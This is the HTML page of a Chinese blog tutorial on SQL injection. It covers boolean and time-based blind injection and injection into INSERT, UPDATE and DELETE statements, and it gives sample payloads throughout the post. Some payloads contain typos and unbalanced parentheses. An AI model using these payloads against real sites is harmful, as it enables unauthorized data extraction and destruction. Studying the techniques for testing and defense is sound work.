<!--
	作者：Sariay
	时间：2018-09-25
	描述：There may be a bug, but don't worry, QiLing(器灵) says that it can work normally!
-->


	<!DOCTYPE html>
	<html>
		

<head><meta name="generator" content="Hexo 3.8.0">
	<title>tr-sxn</title>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="apple-mobile-web-app-title" content="Amaze UI">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
    <meta name="author" content="tr">
    <meta name="keywords" content="safe">
    <meta name="description" content="">
   	<!-- css -->
	<link rel="stylesheet" href="/css/style.css">

	<!-- favicon -->
	<link href="/img/favicon.ico" rel="Shortcut Icon" type="image/ico">
	
	<!-- font-awesome -->
	<link href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
</head>
	<body>	
		<!--Preloader-->
<div id="preloader">
	<div id="status">
		<img alt="PRELOADER" src="/img/logo.png">
	</div>
</div>
<!--Preloader end-->

<!-- header -->

	<header id="header-bg-2">

	
		<div id="cd-logo"><a href="/"><img src="/img/logo.png" alt="Logo"></a></div>
	
	
	<!-- motto or description -->
		
 		<p class="motto"></p>
	
	
	<!-- current page name or title -->
	
		
		
			
			<p class="page-name">当前文章&nbsp;:&nbsp;《》</p>
			
		
	
	
	<!-- others: such as change-bg, time... -->
	<p class="page-name-other">
		1/9/2019 
		<style type="text/css">
	header:after {
		content: '';
		position: relative;
		top: 0;
		left: 0;
		height: 100%;
		width: 100%;
		background: #222222;
		opacity: .5;
		z-index: -1;
	}
	
	.change-header-bg{
		font-style: normal;
	}
	.change-header-bg i{
		text-align: center;
		cursor: pointer;
		pointer-events: bounding-box;
	}
	@media(max-width:512px) {
		.change-header-bg {
			display: none;
			visibility: hidden;
		}
	}
	
</style>

<script type="text/javascript">
	function changeHeaderBg(){
		var random_bg = Math.floor(Math.random() * 109 + 1);
		var bg = 'url(https://XXX-youname-XXX.github.io/Random-img/' + random_bg + '.jpg)';
		$("#header-bg-2").css("background-image", bg);
	}
</script>

<span class="change-header-bg">
	——&nbsp;<i class="fa fa-camera-retro" onclick="changeHeaderBg()"></i>	
</span>
	</p>		
</header>

<!-- nav -->
<div id="cd-nav">
	<a href="#0" title="menu" class="cd-nav-trigger"><span></span></a>

	<nav id="cd-main-nav">
		<ul>
			
      		<li class="fa fa-/">
           		<a href="/" title="主页">主页</a>	
      		</li>
    		
      		<li class="fa fa-/archives">
           		<a href="/archives" title="归档">归档</a>	
      		</li>
    		
      		<li class="fa fa-/categories">
           		<a href="/categories" title="分类">分类</a>	
      		</li>
    		
      		<li class="fa fa-/tags">
           		<a href="/tags" title="标签">标签</a>	
      		</li>
    		
      		<li class="fa fa-/about">
           		<a href="/about" title="关于">关于</a>	
      		</li>
    		
      		<li class="fa fa-/gallery">
           		<a href="/gallery" title="相册">相册</a>	
      		</li>
    		
    		
        	
		</ul>
	</nav>
</div>

		<!--main-->
		<main> 
		<div class="page-container">
		<!-- content srart -->
<div class="am-g am-g-fixed blog-fixed blog-content">
	<div class="am-u-md-8 am-u-sm-12">

		<article class="am-article blog-article-p">

			<div class="am-article-hd">
				


				<h1 class="am-article-title blog-text-center">
					
					
				</h1>

				<p class="am-article-meta blog-text-center">
					<span>
						<i class="fa fa-clock-o"></i> 
						<a href="/2019/01/06/数据库基础2/" itemprop="url">
	<time datetime="2019-01-06T09:37:37.414Z" itemprop="datePublished">
  		2019-01-06
  </time>
</a>    
&nbsp;
					</span>
					
					<span>						
						
					</span>
				</p>
			</div>

			<div class="am-article-bd">
				<div class="content" id="post-content">
					
						<p>[TOC]</p>
<h4 id="一-盲注"><a href="#一-盲注" class="headerlink" title="一.盲注"></a>一.盲注</h4><h5 id="1-布尔盲注"><a href="#1-布尔盲注" class="headerlink" title="1.布尔盲注"></a>1.布尔盲注</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#先得到数据库名的长度</span><br><span class="line">id=1&apos; and (length(version()))&gt;5 %23</span><br><span class="line">id=1&apos; and (length(version()))=4 %23</span><br><span class="line">#改变n的值依次获取数据库名的字符</span><br><span class="line">and (ascii(substr(database(),n,1)))&gt;100</span><br></pre></td></tr></table></figure>
<h5 id="2-延时注入"><a href="#2-延时注入" class="headerlink" title="2.延时注入"></a>2.延时注入</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#先得到数据库名的长度</span><br><span class="line">id=1&apos; and if(length(version()))&gt;5,sleep(5),0) %23</span><br><span class="line"></span><br><span class="line">#改变n的值依次获取数据库名的字符</span><br><span class="line">id=1&apos; and (ascii(substr(database(),n,1)))&gt;100</span><br><span class="line"></span><br><span class="line">#测数据库长度</span><br><span class="line">id=1&apos; and if(select length(schema_name) from information_shema.shemata limit(0,1)&gt;5,sleep(5),0)</span><br><span class="line"></span><br><span class="line">#测数据库的第12个字符</span><br><span class="line">id=1&apos; and if(select ascii(substr(schema_name,12,1)) from information_schema.schemata limit(0,1)&gt;5,sleep(5),0)</span><br></pre></td></tr></table></figure>
<h4 id="二-根据语句的类型盲注"><a href="#二-根据语句的类型盲注" class="headerlink" title="二.根据语句的类型盲注"></a>二.根据语句的类型盲注</h4><h5 id="1-insert"><a href="#1-insert" class="headerlink" title="1.insert"></a>1.insert</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">insert into messages (title,message,......) values (&apos;hello&apos;,&apos;123&apos;,......);</span><br><span class="line"></span><br><span class="line">insert into messages (title,message,time,content,author) values (&apos;hello&apos;,&apos;123&apos;,&apos;2018&apos;,&apos;123&apos;,&apos;admin&apos; );</span><br></pre></td></tr></table></figure>
<p>对insert语句注入非常简单，只需根据语句特点进行构造出一个正常的语句即可</p>
<p>比如上面的语句,对<code>message</code>字段进行注入攻击，可以这样构造：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">insert into messages (title,message,time,content,author) values</span><br><span class="line">(&apos;hello&apos;，&apos;msg&apos;,1,1,1)#&apos;)</span><br></pre></td></tr></table></figure>
<p>根据上述语句，payload构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msg&apos;,1,1,1)#</span><br></pre></td></tr></table></figure>
<p>在实际环境中，我们并不知道有多少个字段，所以就需要一个一个的尝试，只要我们注入攻击的这个字段不在最后一个，就可以完成注入</p>
<p>在后续注入中，只需把<code>1</code>转换为要注入的语句即可</p>
<h5 id="2-update"><a href="#2-update" class="headerlink" title="2.update"></a>2.update</h5><p>update语句一般都是延时注入，不过其他注入也有可能出现，延时注入可以保证语句不被执行</p>
<p>有个特别需要注意的地方：</p>
<p>​    <strong>不要使用<code>&#39; #</code>或<code>&quot; #</code>来执行SQL语句，因为这样会造成所有记录全被执行更新操作，想象一下如果是修改密码时有这个注入，直接全站所有密码被改</strong></p>
<p>​    还有就是update语句一般是在where字句之前，所以构造的注入语句中需要带上where子句</p>
<p>update语句长这样：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">update users set pass = &apos;123456&apos; where name = &apos;user&apos;;</span><br></pre></td></tr></table></figure>
<p>如下测试：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.	123&apos;</span><br><span class="line">2.	123&apos; where sleep(2) #</span><br></pre></td></tr></table></figure>
<p>sleep()函数返回结果为0，所以条件永假，不会执行update操作</p>
<p>但是这样有一个弊端，当where返回false后，mysql回去检索每一个语句，从而执行时间就是`记录数*sleep时间</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123&apos; where id = 100 and sleep(2)#    前提id字段存在</span><br></pre></td></tr></table></figure>
<p>如果存在注入，执行如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123&apos; where id = 100 and if(length(version())&gt;5,sleep(3),0)#</span><br></pre></td></tr></table></figure>
<h5 id="3-delete"><a href="#3-delete" class="headerlink" title="3.delete"></a>3.delete</h5><p>这个语句和update一样，都是高危语句，在进行注入的时候，一定要在本地测试好语句，没问题了再进行注入</p>
<p>delete语句同样也需要注意几个点</p>
<ol>
<li><strong>不要使用<code>&#39; #</code>或<code>&quot; #</code>来执行SQL语句</strong></li>
<li><strong>if语句的返回结果一定要为0</strong>，也就是说if的第2,3个参数的结果一定要为0</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">delete from users where  id = &apos;57&apos; and title = &apos;qwerdf&apos;;</span><br></pre></td></tr></table></figure>
<p>假设输入title</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">请一定要跳过:`qwer&apos;#</span><br><span class="line"></span><br><span class="line">qwer&apos; and sleep(3)#</span><br></pre></td></tr></table></figure>
<p>如果不想真的删除一条数据，就可以使用时间延时盲注，注意if语句返回结果一定要都是0</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qwer&apos; and if(length(version())&gt;5,sleep(3),0) #</span><br></pre></td></tr></table></figure>

					
				</div>
			</div>
		</article>

		<ul class="am-pagination">
    
	
		<li class="am-pagination-next">
		<a class="pull-right" href="/2019/01/01/sql注入基础/" title="">
			下一篇 &raquo;
		</a>
		</li>
	 
 </ul>
        

		<div class="theme-annie-comment-button-container">
	<button id="annie-comment-button" class="theme-annie-comment-button" onclick="Annie_Comment()">
		加载评论
		<!--加载评论-->
	</button>
</div>

<div id="annie-comment-container" class="theme-annie-comment-main-container">

	
		
			<!-- comment valine -->
			<!-- show valine comment -->
<div id="valineComment" class="comment"></div>

<!-- valine`s js & css -->
<script>
	window.jQuery || document.write('<script src="/js/jquery-2.1.1.min.js"><\/script>')
</script>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="/js/valine.min.js"></script>
<link rel="stylesheet" href="/css/comment.css">

<script>
	var checkExistComment = setInterval(function() {
		if( $('#valineComment').length ) {
			new Valine({
				// AV 对象来自上面引入av-min.js(老司机们不要开车➳♡゛扎心了老铁)
				av: AV,
				//使用id寻找div元素（使用class可能找不到）
				el: '#valineComment',
				emoticon_url: 'https://cloud.panjunwen.com/alu',
				emoticon_list: ["吐.png", "期待.png", "高兴.png", "吐血倒地.png", "哭泣.png", "欢呼.png"],
				app_id: "3333....", //获取APP ID
				app_key: "3333......", //获取APP KEY
				placeholder: "no any!", //评论框占位提示文字        			
			});
			clearInterval(checkExistComment);
		}
	}, 100);
</script>
		
	

</div>

<script type="text/javascript">
	/* Show Comment */
	var Annie_Comment = function() {
		function Show_Hidden(obj) {
			obj.style.display = 'block';
		}
		
		//var obutton = $('#annie-comment-button');
		//var obutton = $('#annie-comment-container');
		var obutton = document.getElementById("annie-comment-button" || "0");
		var odiv = document.getElementById("annie-comment-container");
		if( 'obutton' ) {
			obutton.onclick = function() {
				Show_Hidden(odiv);
				$("#annie-comment-button").css("display", 'none');
				return false;
			}
		}
	};

	(function Annie_Init() {
		Annie_Comment();
	})();
</script>
		
		<!--
	时间：2018-09-24
	描述：The TOC module refers to 'https://github.com/codefine/hexo-theme-mellow', include toc.ejs、toc.js、toc.css. All rights reserved by codefine. 
-->

	
		<aside class="post-widget">
			<nav class="post-toc-wrap" id="post-toc">
				
					<strong>文章目录</strong>
				
				
				<!--toc(post.content)-->
				<ol class="post-toc"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#一-盲注"><span class="post-toc-text">一.盲注</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#1-布尔盲注"><span class="post-toc-text">1.布尔盲注</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#2-延时注入"><span class="post-toc-text">2.延时注入</span></a></li></ol></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#二-根据语句的类型盲注"><span class="post-toc-text">二.根据语句的类型盲注</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#1-insert"><span class="post-toc-text">1.insert</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#2-update"><span class="post-toc-text">2.update</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#3-delete"><span class="post-toc-text">3.delete</span></a></li></ol></li></ol>
			</nav>
			<div class="post-toc-bar"><div>
		</div></div></aside>
	

	</div>
</div>
		</div>
		</main>
		
		<!--footer-->
		<footer>
	<div class="blog-text-center">
		<div class="theme-annie-social">
				
				
					<a href="http://github.com/" title="Github" target="_blank"><i class="fa fa-github"></i>&nbsp;</a>
					
				
					<a href="http://github.com/" title="Weibo" target="_blank"><i class="fa fa-weibo"></i>&nbsp;</a>
				
				
					<a href="http://github.com/" title="Email" target="_blank"><i class="fa fa-envelope-o"></i>&nbsp;</a>
					
				
					<a href="http://github.com/" title="QQ" target="_blank"><i class="fa fa-qq"></i>&nbsp;</a>
					
				
					<a href="http://github.com/" title="Twitter" target="_blank"><i class="fa fa-twitter"></i>&nbsp;</a>
						
				
		</div>
	</div>

	<div class="blog-text-center">
		<div class="theme-annie-copyright">
			
				&copy; 2017 - 2019, content by tr. All Rights Reserved.			       	
			
		</div>
	</div>

	<div class="blog-text-center">
		<div class="theme-annie-copyright">
			<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.		
		</div>
	</div>
</footer>
		<!-- <script src="http://code.jquery.com/jquery-2.1.1.min.js" type="text/javascript"></script> -->

<script>
	window.jQuery || document.write('<script src="/js/jquery-2.1.1.min.js"><\/script>')
</script>

<style>
	.motto {
		color: #000000;
		font-size: 20px;
		margin: 100px 25% 0;
		width: 50%;
		line-height: 1.4;
		font-family:"KaiTi", "STXingkai", "Source Sans Pro", "Segoe UI", "Lucida Grande", Helvetica, Arial, "Microsoft YaHei", FreeSans, Arimo, "Droid Sans", "wenquanyi micro hei", "Hiragino Sans GB", "Hiragino Sans GB W3", FontAwesome, sans-serif;
		text-align: center;
	}
	@media(max-width: 890px) {
		.motto {	
			margin: 100px 10% 0;
			width: 80%;
		}
	}
	@media(max-width: 890px) {
		.motto {
			margin: 100px 5% 0;
			width: 90%;
		}
	}
</style>


	<script src="/js/motto.js"></script>
	<script type="text/javascript">
		$(".motto").html(getMingYanContent());
	</script>	







	<script type="text/javascript" src="/js/toc.js"></script>


<script type="text/javascript" src="/js/main.js"></script>

<script type="text/javascript">
	//generate a random img that pre_name 'from 0 to 110'
	var random_bg = Math.floor(Math.random() * 109 + 1);

	//var bg = 'url(/img/random/' + random_bg + '.jpg)';		
	var bg = 'url(https://XXX-youname-XXX.github.io/Random-img/' + random_bg + '.jpg)';

	$("#header-bg-2").css("background-image", bg);
</script>
		
		<!--back to top-->
        <style type="text/css">
	#totop {
		background: white;
		border-radius: 50%;
		position: fixed;
		right: 5.4%;
		bottom: 80px;
		cursor: pointer;
	}
	
	#totop a {
		color: #474747;
		background-color: transparent;
		padding: 10px;
		text-decoration: none;
	}
	
	@media(max-width:512px) {
		#totop {
			display: none;
			visibility: hidden;
		}
	}
</style>


	<div id="totop">
  		<a href="javascript:;" class="fa fa-arrow-up"></a>
	</div>

	</body>
	</html>

